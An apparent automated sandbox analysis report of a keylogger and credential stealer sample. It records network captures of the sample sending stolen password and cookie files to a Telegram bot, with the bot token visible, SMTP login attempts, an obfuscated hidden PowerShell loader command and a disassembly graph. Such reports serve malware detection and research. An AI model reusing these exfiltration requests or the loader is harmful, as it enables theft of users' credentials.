                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1731&rtt_var=659&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1647855&cwnd=192&unsent_bytes=0&cid=a50f6d69981836a0&ts=136&x=0"
                                                                                                                                                            2025-01-10 23:07:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            9192.168.2.1049994104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2025-01-10 23:07:43 UTC859INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:43 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865252
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IiypBuvATpFovxv5sJLPOKFtDDVgeBdcsgPK0hks5OFh9nDO4EP%2F759UouD6fVRd3OyBAvJG8WO8NI0QTsnLbHAZ2jiW0xryx4Bg%2BdWp12s59I%2Bkf4oC%2Fcf%2Bk8Y4ex2X9GPdErhk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 9000532d2aa77293-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2067&min_rtt=2060&rtt_var=788&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1375412&cwnd=158&unsent_bytes=0&cid=885668bc8c991da6&ts=160&x=0"
                                                                                                                                                            2025-01-10 23:07:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            10192.168.2.1049996104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:44 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            2025-01-10 23:07:44 UTC851INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:44 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865253
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hkxjxngj3h2xCWrFoBHRJZzqbd4q7hDuaTjqxB93O0Vt7l4AptAisy8fniroJHUmyAsK7LKu1TMELntmzGTB8Ji7PD5%2B1Wa68SxdEgMWT3WqrJRC69LOPGU0vT5fEi799hhhYphS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 900053354e988ce0-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1789&rtt_var=689&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1567364&cwnd=215&unsent_bytes=0&cid=73c057f1e91b7e69&ts=127&x=0"
                                                                                                                                                            2025-01-10 23:07:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            11192.168.2.1049997149.154.167.2204435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:45 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20048707%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2025-01-10 23:07:45 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:45 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 55
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2025-01-10 23:07:45 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            12192.168.2.1049999149.154.167.2204435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:08:03 UTC366OUTPOST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3282708daf7e
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Content-Length: 580
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2025-01-10 23:08:03 UTC580OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 38 32 37 30 38 64 61 66 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 34 38 37 30 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 38 3a 30 37 3a 33 31 0d 0a
                                                                                                                                                            Data Ascii: --------------------------8dd3282708daf7eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:048707Date and Time: 10/01/2025 / 18:07:31
                                                                                                                                                            2025-01-10 23:08:03 UTC388INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:08:03 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 502
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2025-01-10 23:08:03 UTC502INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 30 31 34 39 37 30 33 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 67 6f 64 66 61 74 68 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 6f 64 66 61 75 64 61 31 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 31 37 31 33 33 38 33 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 66 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 35 30 34 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 50 57 5f 52 65 63 6f
                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":663,"from":{"id":8101497037,"is_bot":true,"first_name":"godfather","username":"godfauda12bot"},"chat":{"id":7171338311,"first_name":"Df","last_name":"T","type":"private"},"date":1736550483,"document":{"file_name":"PW_Reco


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            13192.168.2.1050001149.154.167.2204435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:08:13 UTC348OUTPOST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd32ae06876375
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Content-Length: 1277
                                                                                                                                                            2025-01-10 23:08:13 UTC1277OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 61 65 30 36 38 37 36 33 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 62 72 6f 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 34 38 37 30 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20
                                                                                                                                                            Data Ascii: --------------------------8dd32ae06876375Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:048707Date and Time: 10/01/2025 /
                                                                                                                                                            2025-01-10 23:08:13 UTC388INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:08:13 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 513
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2025-01-10 23:08:13 UTC513INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 30 31 34 39 37 30 33 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 67 6f 64 66 61 74 68 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 6f 64 66 61 75 64 61 31 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 31 37 31 33 33 38 33 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 66 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 35 30 34 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73
                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":664,"from":{"id":8101497037,"is_bot":true,"first_name":"godfather","username":"godfauda12bot"},"chat":{"id":7171338311,"first_name":"Df","last_name":"T","type":"private"},"date":1736550493,"document":{"file_name":"Cookies


                                                                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                            Jan 11, 2025 00:08:00.259912968 CET5874999882.194.91.193192.168.2.10220-hs-1975.servidores-dedicados.es ESMTP Exim 4.96.2 #2 Sat, 11 Jan 2025 00:07:59 +0100
                                                                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                            220 and/or bulk e-mail.
                                                                                                                                                            Jan 11, 2025 00:08:00.260166883 CET49998587192.168.2.1082.194.91.193EHLO 048707
                                                                                                                                                            Jan 11, 2025 00:08:00.477761030 CET5874999882.194.91.193192.168.2.10250-hs-1975.servidores-dedicados.es Hello 048707 [8.46.123.189]
                                                                                                                                                            250-SIZE 52428800
                                                                                                                                                            250-8BITMIME
                                                                                                                                                            250-PIPELINING
                                                                                                                                                            250-PIPECONNECT
                                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                                            250-STARTTLS
                                                                                                                                                            250 HELP
                                                                                                                                                            Jan 11, 2025 00:08:00.478063107 CET49998587192.168.2.1082.194.91.193AUTH login YWJyYWhlckBhYnJhaGVyLmNvbQ==
                                                                                                                                                            Jan 11, 2025 00:08:00.682663918 CET5874999882.194.91.193192.168.2.10334 UGFzc3dvcmQ6
                                                                                                                                                            Jan 11, 2025 00:08:02.455560923 CET5874999882.194.91.193192.168.2.10535 Incorrect authentication data
                                                                                                                                                            Jan 11, 2025 00:08:02.455827951 CET49998587192.168.2.1082.194.91.193MAIL FROM:<abraher@abraher.com>
                                                                                                                                                            Jan 11, 2025 00:08:02.655241966 CET5874999882.194.91.193192.168.2.10550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)
                                                                                                                                                            Jan 11, 2025 00:08:05.828849077 CET5875000082.194.91.193192.168.2.10220-hs-1975.servidores-dedicados.es ESMTP Exim 4.96.2 #2 Sat, 11 Jan 2025 00:08:04 +0100
                                                                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                            220 and/or bulk e-mail.
                                                                                                                                                            Jan 11, 2025 00:08:05.829058886 CET50000587192.168.2.1082.194.91.193EHLO 048707
                                                                                                                                                            Jan 11, 2025 00:08:06.030777931 CET5875000082.194.91.193192.168.2.10250-hs-1975.servidores-dedicados.es Hello 048707 [8.46.123.189]
                                                                                                                                                            250-SIZE 52428800
                                                                                                                                                            250-8BITMIME
                                                                                                                                                            250-PIPELINING
                                                                                                                                                            250-PIPECONNECT
                                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                                            250-STARTTLS
                                                                                                                                                            250 HELP
                                                                                                                                                            Jan 11, 2025 00:08:06.031033039 CET50000587192.168.2.1082.194.91.193AUTH login YWJyYWhlckBhYnJhaGVyLmNvbQ==
                                                                                                                                                            Jan 11, 2025 00:08:10.251218081 CET5875000082.194.91.193192.168.2.10334 UGFzc3dvcmQ6
                                                                                                                                                            Jan 11, 2025 00:08:12.460294008 CET5875000082.194.91.193192.168.2.10535 Incorrect authentication data
                                                                                                                                                            Jan 11, 2025 00:08:12.461553097 CET50000587192.168.2.1082.194.91.193MAIL FROM:<abraher@abraher.com>
                                                                                                                                                            Jan 11, 2025 00:08:12.660594940 CET5875000082.194.91.193192.168.2.10550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:18:06:26
                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                            Path:C:\Users\user\Desktop\Kb94RzMYNf.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Kb94RzMYNf.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:783'354 bytes
                                                                                                                                                            MD5 hash:EE18481E218CC9BC7A1628F5A7365776
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:18:06:27
                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "
                                                                                                                                                            Imagebase:0xdf0000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:18:06:27
                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff620390000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:18:07:17
                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                            Imagebase:0x9a0000
                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:24.5%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:22%
                                                                                                                                                              Total number of Nodes:1265
                                                                                                                                                              Total number of Limit Nodes:39
                                                                                                                                                              execution_graph 3590 401cc0 3591 402ba2 18 API calls 3590->3591 3592 401cc7 3591->3592 3593 402ba2 18 API calls 3592->3593 3594 401ccf GetDlgItem 3593->3594 3595 402531 3594->3595 3596 4029c0 3597 402ba2 18 API calls 3596->3597 3598 4029c6 3597->3598 3599 4029d4 3598->3599 3600 4029f9 3598->3600 3602 40281e 3598->3602 3599->3602 3604 405f97 wsprintfW 3599->3604 3601 406072 18 API calls 3600->3601 3600->3602 3601->3602 3604->3602 3240 401fc3 3241 401fd5 3240->3241 3242 402087 3240->3242 3260 402bbf 3241->3260 3244 401423 25 API calls 3242->3244 3250 4021e1 3244->3250 3246 402bbf 18 API calls 3247 401fe5 3246->3247 3248 401ffb LoadLibraryExW 3247->3248 3249 401fed GetModuleHandleW 3247->3249 3248->3242 3251 40200c 3248->3251 3249->3248 3249->3251 3266 406499 WideCharToMultiByte 3251->3266 3254 402056 3256 4051af 25 API calls 3254->3256 3255 40201d 3258 40202d 3255->3258 3269 401423 3255->3269 3256->3258 3258->3250 3259 402079 FreeLibrary 3258->3259 3259->3250 3261 402bcb 3260->3261 3262 406072 18 API calls 3261->3262 3263 402bec 3262->3263 3264 401fdc 3263->3264 3265 4062e4 5 API calls 3263->3265 3264->3246 3265->3264 3267 4064c3 GetProcAddress 3266->3267 3268 402017 3266->3268 3267->3268 3268->3254 3268->3255 3270 4051af 25 API calls 3269->3270 3271 401431 3270->3271 3271->3258 3605 4016c4 3606 402bbf 18 API calls 3605->3606 3607 4016ca GetFullPathNameW 3606->3607 3608 401706 3607->3608 3609 4016e4 3607->3609 3610 40171b GetShortPathNameW 3608->3610 3611 402a4c 3608->3611 3609->3608 3612 406393 2 API calls 3609->3612 3610->3611 3613 4016f6 3612->3613 3613->3608 3615 406050 lstrcpynW 3613->3615 3615->3608 3616 4042c5 3617 4042d3 3616->3617 3618 404114 19 API calls 3617->3618 3619 404330 3618->3619 3620 404114 19 API calls 3619->3620 3621 40433d CheckDlgButton 3620->3621 3629 404136 KiUserCallbackDispatcher 3621->3629 3623 40435b GetDlgItem 3630 404149 SendMessageW 3623->3630 3625 404371 SendMessageW 3626 404397 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3625->3626 3627 40438e GetSysColor 3625->3627 3628 40453d 3626->3628 3627->3626 3629->3623 3630->3625 3631 402a46 InvalidateRect 3632 402a4c 3631->3632 3633 4014cb 3634 4051af 25 API calls 3633->3634 3635 4014d2 3634->3635 3636 40194e 3637 402bbf 18 API calls 3636->3637 3638 401955 lstrlenW 3637->3638 3639 402531 3638->3639 3640 4027ce 3641 4027d6 3640->3641 3642 4027da FindNextFileW 3641->3642 3645 4027ec 3641->3645 3643 402833 3642->3643 3642->3645 3646 406050 lstrcpynW 3643->3646 3646->3645 3401 401754 3402 402bbf 18 API calls 3401->3402 3403 40175b 3402->3403 3404 405c54 2 API calls 3403->3404 3405 401762 3404->3405 3406 405c54 2 API calls 3405->3406 3406->3405 3647 401d56 GetDC GetDeviceCaps 3648 402ba2 18 API calls 3647->3648 3649 401d74 MulDiv ReleaseDC 3648->3649 3650 402ba2 18 API calls 3649->3650 3651 401d93 3650->3651 3652 406072 18 API calls 3651->3652 3653 401dcc CreateFontIndirectW 3652->3653 3654 402531 3653->3654 3655 401a57 3656 402ba2 18 API calls 3655->3656 3657 401a5d 3656->3657 3658 402ba2 18 API 